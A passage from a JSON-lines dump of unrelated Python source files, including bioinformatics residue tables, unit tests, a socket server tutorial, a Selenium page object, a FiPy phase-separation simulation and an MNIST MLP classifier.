== 'VAL') :\n return(\"V\")\n elif(aa == 'TRP') :\n return(\"W\")\n elif(aa == 'TYR') :\n return(\"Y\")\n # non standart amino acid / translation accorded to ProDyn web site http://www.csb.pitt.edu/prody/reference/atomic/flags.html\n elif (aa == 'ASX' ) : # asparagine or aspartic acid\n return \"B\" \n elif (aa == 'GLX' ) : # glutamine or glutamic acid\n return \"Z\" \n elif (aa == 'CSO') : # S-hydroxycysteine\n return \"C\" \n elif (aa == 'HIP' ) : # ND1-phosphohistidine\n return \"H\" \n elif (aa == 'HSD' ) : # prototropic tautomer of histidine, H on ND1 (CHARMM)\n return \"H\" \n elif (aa == 'HSE' ) : # prototropic tautomer of histidine, H on NE2 (CHARMM)\n return \"H\" \n elif (aa == 'HSP' ) : # protonated histidine\n return \"H\" \n elif (aa == 'MSE' ) : # selenomethionine\n return \"X\" \n elif (aa == 'SEC' ) : # selenocysteine\n return \"X\" \n elif (aa == 'SEP' ) : # phosphoserine\n return \"S\" \n elif (aa == 'TPO' ) : # phosphothreonine\n return \"T\" \n elif (aa == 'PTR' ) : # O-phosphotyrosine\n return \"Y\" \n elif (aa == 'XLE' ) : # leucine or isoleucine\n return \"L\" # or I\n elif (aa == 'XAA') : # unspecified or unknown\n return X \n else :\n if verbose :\n print >>sys.stderr, \"The amino acid \",aa,\" is unknown!\" \n return \"X\"\n #raise ValueError( \"The amino acid \",aa,\" is unknown!\" ) \n\nclass Residu :\n\n def __init__(self, name = \"\", numRes = -1 , chain = \"A\" ) :\n self.name = name\n self.numRes = numRes\n self.chain = chain\n\n def __repr__(self) :\n return \"%s %d %s \"%(self.name, self.numRes, self.chain)\n\n def convertAA(self) :\n if len(self.name)>1:\n return AA3toAA1(self.name)\n else :\n return AA1toAA3(self.name)\n\nveryHydrophobic = [\"VAL\",\"ILE\", \"LEU\", \"MET\", \"PHE\", \"TRP\", \"CYS\"]\nlessHydrophobic = [\"ALA\", \"TYR\", \"HIS\", \"THR\", \"SER\", \"PRO\", \"GLY\"]\nhydrophobic = veryHydrophobic+lessHydrophobic\npolar = [\"ARG\", \"LYS\", \"ASP\", \"GLU\", \"ASN\", \"GLN\"]\nlessPolar = [\"HIS\", \"ALA\", \"TYR\", \"THR\", \"SER\", \"PRO\", \"GLY\" ]\ntiny = [\"GLY\", \"ALA\", \"SER\", \"PRO\"]\nsmall = [\"THR\",\"ASP\",\"ASN\"]\naliphatic = [\"ILE\", \"VAL\", \"LEU\", \"ALA\", \"PRO\" ]\naliphaticExtended = aliphatic + [\"MET\"]\nchargedNeg = [ \"GLU\", \"ASP\"]\nchargedPlus = [\"ARG\", \"LYS\"]\nhydrophilic = ['GLN', 'ASN', 'LYS', 'ASP', 'ARG', 'GLU']\nchargedPlusExtended = chargedPlus+[\"HIS\"]\naromatic = [\"PHE\", \"TRP\", \"TYR\", \"HIS\" ]\nall = ['CYS', 'GLN', 'ILE', 'SER', 'VAL', 'GLY', 'ASN', 'PRO', 'LYS', 'ASP', 'THR', 'PHE', 'ALA', 'MET', 'HIS', 'LEU', 'ARG', 'TRP', 'GLU', 'TYR', 'UNK']\n\nAA3 = ['CYS', 'GLN', 'ILE', 'SER', 'VAL', 'GLY', 'ASN', 'PRO', 'LYS', 'ASP', 'THR', 'PHE', 'ALA', 'MET', 'HIS', 'LEU', 'ARG', 'TRP', 'GLU', 'TYR', 'UNK']\nAA1 = [ AA3toAA1(aa, verbose=False) for aa in AA3 ]\n\ndicAA1Type = {\n \"hydrophobic\" : [\"V\",\"I\", \"L\", \"M\", \"F\", \"W\", \"C\", \"Y\", \"H\", \"T\" ],\n \"hydrophilic\" : ['Q', 'N', 'K', 'D', 'R', 'E'],\n \"tiny\" : [\"G\", \"A\", \"S\", \"P\"] ,\n}\n\ndicAA3Type = {\n \"hydrophobic\" : [\"VAL\",\"ILE\", \"LEU\", \"MET\", \"PHE\", \"TRP\", \"CYS\", \"ALA\", \"TYR\", \"HIS\", \"THR\", \"SER\", \"PRO\", \"GLY\" ],\n \"hydrophilic\" : ['GLN', 'ASN', 'LYS', 'ASP', 'ARG', 'GLU'],\n \"tiny\" : [\"GLY\", \"ALA\", \"SER\", \"PRO\"] ,\n}\n\nisHydrophobe_AA3 = {\"ALA\": True ,\n\"CYS\": True ,\n\"ASP\": False ,\n\"GLU\": False ,\n\"PHE\": True ,\n\"GLY\": True ,\n\"HIS\": False ,\n\"ILE\": True ,\n\"LYS\": False ,\n\"LEU\": True ,\n\"MET\": True ,\n\"ASN\": False ,\n\"PRO\": True ,\n\"GLN\": False ,\n\"ARG\": False ,\n\"SER\": False ,\n\"THR\": True ,\n\"VAL\": True ,\n\"TRP\": True ,\n\"TYR\": True ,\n\"UNK\": False\n}\n\nisHydrophobe_AA1 = {\"A\": True ,\n\"C\": True ,\n\"D\": False ,\n\"E\": False ,\n\"F\": True ,\n\"G\": True ,\n\"H\": False ,\n\"I\": True ,\n\"K\": False ,\n\"L\": True ,\n\"M\": True ,\n\"N\": False ,\n\"P\": True ,\n\"Q\": False ,\n\"R\": False ,\n\"S\": False ,\n\"T\": True ,\n\"V\": True ,\n\"W\": True ,\n\"Y\": True ,\n\"U\": False\n}\n\n\nResiduHeavyAtom = {\n\"A\": [\"N\",\"CA\",\"C\",\"O\",\"CB\"] ,\n\"C\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"SG\"] ,\n\"D\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"OD1\",\"OD2\"] ,\n\"E\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD\",\"OE1\",\"OE2\"] ,\n\"F\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD2\",\"CE2\",\"CZ\",\"CE1\",\"CD1\"] ,\n\"G\": [\"N\",\"CA\",\"C\",\"O\"] ,\n\"H\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD2\",\"NE2\",\"CE1\",\"ND1\"] ,\n\"I\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG1\",\"CG2\",\"CD1\"] ,\n\"K\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD\",\"CE\",\"NZ\"] ,\n\"L\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD1\",\"CD2\"] ,\n\"M\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"SD\",\"CE\"] ,\n\"N\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"OD1\",\"ND2\"] ,\n\"P\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD\"] ,\n\"Q\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD\",\"OE1\",\"NE2\"] ,\n\"R\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD\",\"NE\",\"CZ\",\"NH1\",\"NH2\"] ,\n\"S\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"OG\"] ,\n\"T\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG2\",\"OG1\"] ,\n\"V\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG1\",\"CG2\"] ,\n\"W\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD1\",\"NE1\",\"CE2\",\"CZ2\",\"CH2\",\"CZ3\",\"CE3\",\"CD2\"] ,\n\"Y\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD1\",\"CD2\",\"CE1\",\"CE2\",\"CZ\",\"OH\"],\n\"U\": []\n}\n\n\nResiduSideChainHeavyAtom = {\n\"A\": [\"CB\"] ,\n\"C\": [\"CB\",\"SG\"] ,\n\"D\": [\"CB\",\"CG\",\"OD1\",\"OD2\"] ,\n\"E\": [\"CB\",\"CG\",\"CD\",\"OE1\",\"OE2\"] ,\n\"F\": [\"CB\",\"CG\",\"CD2\",\"CE2\",\"CZ\",\"CE1\",\"CD1\"] ,\n\"G\": [] ,\n\"H\": [\"CB\",\"CG\",\"CD2\",\"NE2\",\"CE1\",\"ND1\"] ,\n\"I\": [\"CB\",\"CG1\",\"CG2\",\"CD1\"] ,\n\"K\": [\"CB\",\"CG\",\"CD\",\"CE\",\"NZ\"] ,\n\"L\": [\"CB\",\"CG\",\"CD1\",\"CD2\"] ,\n\"M\": [\"CB\",\"CG\",\"SD\",\"CE\"] ,\n\"N\": [\"CB\",\"CG\",\"OD1\",\"ND2\"] ,\n\"P\": [\"CB\",\"CG\",\"CD\"] ,\n\"Q\": [\"CB\",\"CG\",\"CD\",\"OE1\",\"NE2\"] ,\n\"R\": [\"CB\",\"CG\",\"CD\",\"NE\",\"CZ\",\"NH1\",\"NH2\"] ,\n\"S\": [\"CB\",\"OG\"] ,\n\"T\": [\"CB\",\"CG2\",\"OG1\"] ,\n\"V\": [\"CB\",\"CG1\",\"CG2\"] ,\n\"W\": [\"CB\",\"CG\",\"CD1\",\"NE1\",\"CE2\",\"CZ2\",\"CH2\",\"CZ3\",\"CE3\",\"CD2\"] ,\n\"Y\": [\"CB\",\"CG\",\"CD1\",\"CD2\",\"CE1\",\"CE2\",\"CZ\",\"OH\"],\n\"U\": []\n}\n","sub_path":"myBio/structure/Residu.py","file_name":"Residu.py","file_ext":"py","file_size_in_byte":7486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"34684388","text":"import time\nimport traceback\nimport unittest\nfrom hyd.analysis.save_result import SaveResult\nfrom hyd.realtime import enums\nfrom hyd.analysis.out2dict import OutToDict\n\n\nclass TestAnalysis(unittest.TestCase):\n\n def test_save(self):\n t = time.time()\n try:\n s = SaveResult('online_after', enums.OnlineType.YUCE)\n s.main()\n except Exception:\n traceback.print_exc()\n print(f'time used {time.time() - t}')\n\n def test_pump_freq(self):\n all_data = OutToDict('online_after').get_data()\n num_periods = all_data['num_periods']\n df_nodes = all_data['df_nodes']\n df_links = all_data['df_links']\n temp_df_link = df_links.loc[0]\n status = int(temp_df_link.loc[freq_key, constants.LINK_FIELD_STATUS])\n status = constants.OPEN if status == 1 else constants.CLOSED\n frequency = str(round(float(temp_df_link.loc[freq_key, constants.LINK_FREQUENCY]) * 50, 1))\n ptime = (self.dt + timedelta(minutes=5 * peri)).strftime(constants.FORMAT_DATA_DATE)\n","sub_path":"src/test/test_save.py","file_name":"test_save.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"163502935","text":"\"\"\"\n Tests for the :mod:`regression_tests.web.utils` module.\n\"\"\"\n\nimport unittest\n\nfrom regression_tests.test_case import TestCaseName\nfrom regression_tests.web.utils import interactive_case_name\nfrom regression_tests.web.utils import limit_shown_commits\n\n\nclass InteractiveCaseNameTests(unittest.TestCase):\n \"\"\"Tests for `interactive_case_name()`.\"\"\"\n\n def test_puts_proper_onclick_action_for_tool_with_args(self):\n self.assertEqual(\n interactive_case_name(\n TestCaseName('TestCase (file.exe -a x86)'),\n 'dir.subdir'\n ),\n \"\"\"TestCase (file.exe -a x86)\"\"\"\n )\n\n def test_puts_proper_onclick_action_for_tool_without_args(self):\n # It checks that there is no redundant space after the input file when\n # there are no additional tool arguments.\n self.assertEqual(\n interactive_case_name(\n TestCaseName('TestCase (file.exe)'),\n 'dir.subdir'\n ),\n \"\"\"TestCase (file.exe)\"\"\"\n )\n\n def test_shortens_long_case_name_when_limit_is_given(self):\n self.assertEqual(\n interactive_case_name(\n TestCaseName('TestCase (file.exe)'),\n 'dir.subdir',\n limit=2\n ),\n \"\"\"TestCase (file[..])\"\"\"\n )\n\n\nclass LimitShownCommitsTests(unittest.TestCase):\n \"\"\"Tests for `limit_shown_commits()`.\"\"\"\n\n def test_returns_max_count_when_selected_count_is_zero(self):\n self.assertEqual(limit_shown_commits('0', 5), 5)\n\n def test_returns_selected_count_when_less_than_max_count(self):\n self.assertEqual(limit_shown_commits('4', 5), 4)\n\n def test_returns_max_count_when_more_than_max_count(self):\n self.assertEqual(limit_shown_commits('6', 5), 5)\n\n def test_returns_max_count_when_selected_count_is_invalid(self):\n self.assertEqual(limit_shown_commits('a', 5), 5)\n","sub_path":"tests/web/utils_tests.py","file_name":"utils_tests.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"379737101","text":"import socket\nimport threading\n\n\n\nclass ThreadForClient(threading.Thread):\n def __init__(self, conn):\n threading.Thread.__init__(self)\n self.conn = conn\n\n def run(self):\n data = conn.recv(1024)\n data = data.decode(\"utf8\")\n print(data)\n\n\nhost, port = ('', 5556)\n\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsocket.bind((host, port))\nprint(\"Le serveur est démarré !\")\n\nwhile True:\n socket.listen()\n conn, address = socket.accept()\n print(\"Un clien vient de se connecter ...\")\n\n \"\"\" Mise en commentaire à cause de l'usage de Thread\n data = conn.recv(1024)\n data = data.decode(\"utf8\")\n print(data)\n \"\"\"\n\n my_thread = ThreadForClient(conn)\n my_thread.start()\n\n\nconn.close()\nsocket.close()","sub_path":"Tuto_Python3/22_socket/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"385755730","text":"import cv2\nimport time\nimport numpy as np\nimport pywinauto\nfrom pywinauto import Application\nfrom selene import browser\nfrom selene.support import by\nfrom selene.api import *\nfrom selene.support.jquery_style_selectors import s, ss\n# config.browser_name = 'chrome'\nfrom PIL import Image\n\n# from selenium.webdriver.chrome.options import Options\n# from selenium import webdriver\n# from webdriver_manager.chrome import ChromeDriverManager\n# chrome_options = Options()\n# chrome_options.add_argument(\"--headless\")\n# chrome_options.add_argument(\"--window-size=1920x1080\")\n#\n# driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=chrome_options,)\n# browser.set_driver(driver)\n\nclass MainPage(object):\n def __init__(self):\n self._header = s('app-lbl[ng-reflect-key=\"Header_Toolbar_WelcomeTo\"]')\n self.pl = s(by.xpath('//div[text()=\"PL\"]'))\n self.en = s(by.xpath('//div[text()=\"EN\"]'))\n ############################################################\n self._new_job_mane = s('#jobsListNewJobNameInput')\n self._add_button = s('#jobsListNewJobNameButton')\n self.jobs_list = ss(by.xpath(' //*[starts-with(@id,\"jobsListJob\")]//h3'))\n self.first_job = browser.element(by.xpath(' (//*[starts-with(@id,\"jobsListJob\")]//h3)[1]'))\n self.removes = browser.elements(by.xpath('//h3[@class=\"mat-line\"]/../../button'))\n self._body = s('mat-toolbar.mat-primary > span:nth-child(1)')\n self.job = 'h3.mat-line'\n self.work_plate = '#canvasPanel'\n ############################################################\n self.allert = s(by.xpath('//snack-bar-container//span'))\n ############################################################\n self.work_tab = s(by.xpath('//app-lbl[text()=\"Work\"]'))\n\n def job(self, name):\n return '//h3[contains(text(), \"{}\")]'.format(name)\n\n def open(self):\n browser.open_url(\"/\")\n return self\n\n def add_job(self, name):\n self._new_job_mane.set(name)\n self._add_button.click()\n return self\n\n def test_upload_from_pc(self):\n s('#jobsListAttachJobButton').click()\n app = Application().connect(title_re=\"Open*\")\n app.Open.Edit.set_edit_text('C:\\\\Users\\\\ssoloshchenko\\\\Desktop\\\\jobs\\\\vector .pdf') # update path to local file\n while True:\n try:\n app.Open.Button.click() # open button is getting focused\n except pywinauto.findbestmatch.MatchError:\n break\n time.sleep(1)\n return self\n\n def remove_job(self, job_name):\n s(by.xpath('//h3[contains(text(), \"{}\")]/../..//button[starts-with(@id,\"jobsListJobDeleteButton\")]'\n .format(job_name))).click()\n return self\n # def remove_jobs(self, *jobs):\n # for job in jobs:\n # s(by.xpath('//h3[contains(text(), \"{}\")]/../../button'.format(job))).click()\n # return self\n\n def remove_all_jobs(self):\n time.sleep(1)\n jobs = ss(by.xpath('//button[starts-with(@id,\"jobsListJobDeleteButton\")]'))\n count = len(jobs)\n while count >= 1:\n jobs[count - 1].click()\n time.sleep(0.1)\n count -= 1\n return self\n\n def compare_screens(self, name_expected, path, image_folder, test):\n expected = cv2.imread(name_expected)\n actual = cv2.imread(path)\n difference = cv2.subtract(expected, actual)\n result = not np.any(difference)\n if result is True:\n print(\"Images are same\")\n return True\n else:\n cv2.imwrite('{}\\\\{}.png'.format(image_folder, test), difference)\n print('Images are different')\n return False\n\n def compare(self, f, name, name_expected, test):\n image_folder = f\n time.sleep(2)\n #Will take a screenshot as png and will place it in newly created folder\n path = browser.take_screenshot(path=image_folder, filename='{}'.format(name))\n return self.compare_screens(name_expected, path, image_folder, test)\n\n def screenshot(self, f, name):\n image_folder = f\n time.sleep(2)\n browser.take_screenshot(path=image_folder, filename='{}'.format(name))\n\n def compare_canvas(self, f, name, name_expected, test):\n time.sleep(1)\n #TODO add object as a paremeter\n image_folder = f\n element = s(\"#canvas123\")\n location = element.location\n size = element.size\n path = browser.take_screenshot(path=image_folder, filename='{}'.format(name))\n x = location['x']\n y = location['y']\n width = location['x'] + size['width']\n height = location['y'] + size['height']\n im = Image.open(path)\n im = im.crop((int(x), int(y), int(width), int(height)))\n im.save(path)\n return self.compare_screens(name_expected, path, image_folder, test)\n\n\n","sub_path":"src/main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":4920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"11226552","text":"users = [\n { \"id\": 0, \"name\": \"Hero\" },\n { \"id\": 1, \"name\": \"Dunn\" },\n { \"id\": 2, \"name\": \"Sue\" },\n { \"id\": 3, \"name\": \"Chi\" },\n { \"id\": 4, \"name\": \"Thor\" },\n { \"id\": 5, \"name\": \"Clive\" },\n { \"id\": 6, \"name\": \"Hicks\" },\n { \"id\": 7, \"name\": \"Devin\" },\n { \"id\": 8, \"name\": \"Kate\" },\n { \"id\": 9, \"name\": \"Klein\" },\n ]\n\nfriendship_pairs = [(0, 1), (0, 2), (1, 2), (1, 3), (2, 3), (3, 4),\n (4, 5), (5, 6), (5, 7), (6, 8), (7, 8), (8, 9)]\n\n# To find all the friendships for one user we will make adjacency list\n\nfriendships = {item[\"id\"]: [] for item in users} # initialize each user friendship list by empty one\n\nfor i, j in friendship_pairs:\n friendships[i].append(j) # Add j as a friend of user i\n friendships[j].append(i) # Add i as a friend of user j\n\n\ndef number_of_friends(user):\n user_id = user[\"id\"]\n friends = friendships[user_id]\n return len(friends)\n\n\ndef total_connections():\n return sum(number_of_friends(user) for user in users)\n\n\ndef average_connections():\n return total_connections() / len(users)\n\n# print(number_of_friends(users[3])) --> 3\n\n\n'''to find the most connected users we need to have a list of the users sorted by number of friends'''\n\n\ndef most_connections():\n users_by_number_of_friends = [(user[\"id\"], number_of_friends(user))for user in users]\n users_by_number_of_friends.sort(key=lambda x: x[1], reverse=True)\n return users_by_number_of_friends\n\n\ndef print_by_number_of_friends():\n curr_list = most_connections()\n print(curr_list)\n \n \nprint_by_number_of_friends() \n\n# Output\n# [(1, 3), (2, 3), (3, 3), (5, 3), (8, 3), (0, 2), (4, 2), (6, 2), (7, 2), (9, 1)]\n# This result doesn't mean the user with id = \"1\" is the most centralized user in our network\n\nprint(average_connections())\n# Output\n# 2.4\n","sub_path":"Finding-Key-Connectors.py","file_name":"Finding-Key-Connectors.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"541910035","text":"\"\"\"\n fork 创建进程\n\"\"\"\nimport os\nfrom time import sleep\npid = os.fork()\nif pid < 0:\n print('failed')\n# 子进程执行\nelif pid == 0:\n sleep(3)\n print('new',pid)\n# 父进程执行\nelse:\n sleep(4)\n print('old',pid)\nprint('over')\n","sub_path":"python_learn/python_net/fork.py","file_name":"fork.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"453074950","text":"import unittest\nfrom st import run\n\n\nclass MyTestCase(unittest.TestCase):\n def test_run(self):\n c = run('c = a + b', key='c', a=1, b=2)\n self.assertEqual(c, 3)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_run.py","file_name":"test_run.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"29224734","text":"\nfrom fipy import CellVariable, GaussianNoiseVariable, DiffusionTerm, TransientTerm, ImplicitSourceTerm, VTKCellViewer, LinearLUSolver\nfrom fipy.tools import numerix\nimport time\nfrom fipy import PeriodicGrid2D, Viewer, UniformNoiseVariable\n\n# Simulation parameters\n# Mesh resolution and domain size\nnx = ny = 50\ndx = dy = 1.0\n# Initial composition\na_0 = 0.77\n# Noise magnitude\nnoise_mag = 0.03\n# Flory-Huggins interaction parameter\nchi_AB = 0.006\n# Length of polymer chains\nn_a = 1000\nn_b = 1000\n\n# Defining the mesh\nmesh = PeriodicGrid2D(nx=nx, ny=ny, dx=dx, dy=dy)\n\n# Defining the variables\na = CellVariable (name=r\"$a$\", mesh=mesh, hasOld=1)\nmu_AB = CellVariable(name=r\"$\\mu_{AB}\", mesh=mesh, hasOld=1)\n\n# Setting the initial composition of the system with noise\nnoise = UniformNoiseVariable(mesh=mesh, minimum=(a_0-noise_mag), maximum=(a_0+noise_mag))\na[:] = noise\n\n# differentiate g(a)\ndgda = ((1.0/n_a) - (1.0/n_b)) + (1.0/n_a)*numerix.log(a) - (1.0/n_b)*numerix.log(1.0 - a) + chi_AB*(1.0 - 2*a)\nd2gda2 = (1.0/(n_a*a)) + (1.0/(n_b*(1.0 - a))) - 2*chi_AB\n\n# Evaluate kappa\nkappa = (2.0/3.0)*chi_AB\n\n# Defining the equations\neq1 = (TransientTerm(var=a)) == DiffusionTerm(coeff=a*(1.0-a), var=mu_AB)\neq2 = (ImplicitSourceTerm(coeff=1.0, var=mu_AB)) == dgda - DiffusionTerm(coeff=kappa, var=a)\n# eq2 = (ImplicitSourceTerm(coeff=1.0, var=mu_AB)) == ImplicitSourceTerm(coeff=d2gda2, var=a) - d2gda2*a + dgda - DiffusionTerm(coeff=kappa, var=a)\n\n# Coupling the equations\neq = eq1 & eq2\n\n# Setting up the solver\nsolver = LinearLUSolver(tolerance=1e-9, iterations=50, precon=\"ilu\")\n\n# Set up time stepping\ndt = 10.0\nduration = 20000\ntime_stride = 100\ntimestep = 0\nelapsed =0\n\n# Initialising the viewer\nif __name__ == \"__main__\":\n viewer = Viewer(vars=(a), datamin=0., datamax=1.)\n\n# start the time\nstart = time.time()\n\n# Time stepping\nwhile elapsed < duration: \n elapsed += dt\n timestep += 1\n a.updateOld()\n mu_AB.updateOld()\n res = 1e4\n while res > 1e-10:\n res = eq.sweep(dt=dt, solver=solver)\n print (\"sweep\")\n print (res)\n print (elapsed)\n end = time.time()\n print (end-start)\n if (timestep % time_stride ==0):\n print (\"Beep\")\n if __name__ == '__main__':\n viewer.plot()\nif __name__ == '__main__':\n input(\"Press to proceed...\")\n\n# Code for VTK ouput\n# while elapsed < duration: \n# if (timestep == 0):\n# vw = VTKCellViewer(vars=(a, mu_AB))\n# vw.plot(filename=\"0_output.vtk\")\n# elapsed += dt\n# timestep += 1\n# a.updateOld()\n# mu_AB.updateOld()\n# res = 1e+10\n# while res > 1e-10:\n# res = eq.sweep(dt=dt, solver=solver)\n# print (\"sweep!\")\n# print (elapsed)\n# end = time.time()\n# print(end-start)\n# if (timestep % time_stride ==0):\n# vw = VTKCellViewer(vars=(a, mu_AB))\n# vw.plot(filename=\"%s_output.vtk\" %(elapsed))\n\n\n ","sub_path":"Figures/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"139808908","text":"import torch\nfrom torch.autograd import Variable\nfrom torch import FloatTensor\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport gzip\nimport pickle\n\n\nclass MLPClassifier(nn.Module):\n def __init__(self, input_dim = 784, hidden_nodes=100, output_dim=10):\n super(MLPClassifier, self).__init__()\n self.lin_input = nn.Linear(input_dim, hidden_nodes)\n self.lin_hidden = nn.Linear(hidden_nodes, hidden_nodes)\n self.lin_output = nn.Linear(hidden_nodes, output_dim)\n def forward(self, x):\n x = self.lin_input(x)\n x = F.relu(x)\n x = self.lin_hidden(x)\n x = F.sigmoid(x)\n x = self.lin_output(x)\n # Apply output conversion\n x = F.sigmoid(x)\n return x\n\ndef weights_init(model):\n for m in model.modules():\n if isinstance(m, nn.Linear):\n # initialize the weight tensor, here we use a normal distribution\n m.weight.data.normal_(0, 1)\n #m.weight.data.normal_(0.1,0.2)\n\ndef calc_miscl_err(X, Y, Yhat):\n \"\"\"\n Calculate the misclassification error (according to class canvas)\n \"\"\"\n indsYhat=np.argmax(Yhat,axis=1)\n indsY=np.argmax(Y,axis=1)\n errors = (indsYhat-indsY)!=0\n return (100*sum(errors)/(Yhat.shape[0]*1.0))\n\ndef calc_avg_sq_err(X, Y, Y_hat):\n \"\"\"\n Function for calculating the average squared error\n \"\"\"\n # Define dimensionality\n N = len(X)\n d = len(X[0])\n # Calculate the error\n error = ((1)/(2*N)) * (np.linalg.norm( Y - Y_hat ))**2\n return error\ndef stand(x):\n # gives an affine transformation to place x between 0 and 1 (from canvas)\n x=x-np.min(x[:])\n x=x/(np.max(x[:])+1e-12)\n return x\n\ndef plot_10(X, eta, epochs):\n \"\"\"\n Visualize ten weights\n \"\"\"\n fig = plt.figure(figsize=(16,6))\n f, axarr = plt.subplots(2, 5)\n axarr[0, 0].imshow(stand(X[1]).reshape(28,28), cmap='gray')\n axarr[0, 0].set_title('Node 1')\n axarr[0, 1].imshow(stand(X[3]).reshape(28,28), cmap='gray')\n axarr[0, 1].set_title('Node 2')\n axarr[0, 2].imshow(stand(X[5]).reshape(28,28), cmap='gray')\n axarr[0, 2].set_title('Node 3')\n axarr[0, 3].imshow(stand(X[7]).reshape(28,28), cmap='gray')\n axarr[0, 3].set_title('Node 4')\n axarr[0, 4].imshow(stand(X[9]).reshape(28,28), cmap='gray')\n axarr[0, 4].set_title('Node 5')\n axarr[1, 0].imshow(stand(X[11]).reshape(28,28), cmap='gray')\n axarr[1, 0].set_title('Node 6')\n axarr[1, 1].imshow(stand(X[13]).reshape(28,28), cmap='gray')\n axarr[1, 1].set_title('Node 7')\n axarr[1, 2].imshow(stand(X[15]).reshape(28,28), cmap='gray')\n axarr[1, 2].set_title('Node 8')\n axarr[1, 3].imshow(stand(X[17]).reshape(28,28), cmap='gray')\n axarr[1, 3].set_title('Node 9')\n axarr[1, 4].imshow(stand(X[19]).reshape(28,28), cmap='gray')\n axarr[1, 4].set_title('Node 10')\n plt.savefig(\"Problem_3.1_\"+str(eta)+\"_\"+str(epochs)+\"_weights.png\", bbox_inches='tight')\n plt.close(fig)\n\ndef plot_single(data):\n \"\"\"\n Plot a single digit\n \"\"\"\n plt.imshow(data.reshape(28,28), cmap='gray')\n plt.title('Digit')\n plt.show()\n\ndef main():\n \"\"\"\n Main function to run the procedure\n \"\"\"\n # Import all the data and define some dimensionalities\n print(\"Reading in data...\")\n with gzip.open(\"mnist.pkl.gz\") as f:\n train_set, dev_set, test_set = pickle.load(f, encoding = 'bytes')\n Xtrain = train_set[0]\n train_label = train_set[1]\n Xdev = dev_set[0]\n dev_label = dev_set[1]\n Xtest = test_set[0]\n test_label = test_set[1]\n N_train = len(Xtrain)\n d = len(Xtrain[0])\n # Add bias to data\n Xtrain[:, 783] = 1\n Xdev[:, 783] = 1\n Xtest[:, 783] = 1\n # Create label matrices\n Ytrain = np.zeros(len(Xtrain)*10).reshape(len(Xtrain), 10)\n Ydev = np.zeros(len(Xdev)*10).reshape(len(Xdev), 10)\n Ytest = np.zeros(len(Xtest)*10).reshape(len(Xtest), 10)\n for i in range(len(Xtrain)):\n Ytrain[i, train_label[i]] = 1\n for i in range(len(Xdev)):\n Ydev[i, dev_label[i]] = 1\n for i in range(len(Xtest)):\n Ytest[i, test_label[i]] = 1\n print(\"...done\")\n print()\n # Load model and initialize weigths and loss function\n model = MLPClassifier()\n weights_init(model)\n loss_func = nn.MSELoss()\n # Define further parameters\n epochs = 500\n m = 100\n eta = 0.1\n # Define optimizer as stochastic gradient descent\n optimizer = optim.SGD(model.parameters(), lr=eta, momentum=0.9)\n # Number of iterations per standard epoch\n iterations = int(N_train/m)\n # Create tensors for pytorch\n Xtrain_pt = Variable(FloatTensor(Xtrain), requires_grad=False)\n Ytrain_pt = Variable(FloatTensor(Ytrain), requires_grad=False)\n Xdev_pt = Variable(FloatTensor(Xdev), requires_grad=False)\n Ydev_pt = Variable(FloatTensor(Ydev), requires_grad=False)\n Xtest_pt = Variable(FloatTensor(Xtest), requires_grad=False)\n Ytest_pt = Variable(FloatTensor(Ytest), requires_grad=False)\n # Create Arrays for storing the errors\n error_train_arr = np.array(0)\n error_train_arr = np.delete(error_train_arr, 0)\n error_dev_arr = np.array(0)\n error_dev_arr = np.delete(error_dev_arr, 0)\n error_test_arr = np.array(0)\n error_test_arr = np.delete(error_test_arr, 0)\n misc_train_arr = np.array(0)\n misc_train_arr = np.delete(misc_train_arr, 0)\n misc_dev_arr = np.array(0)\n misc_dev_arr = np.delete(misc_dev_arr, 0)\n misc_test_arr = np.array(0)\n misc_test_arr = np.delete(misc_test_arr, 0)\n # Start training the neural network\n print(\"Starting training of MLP Classifier\")\n print()\n for i in range(epochs):\n # For each epoch, shuffle Training set 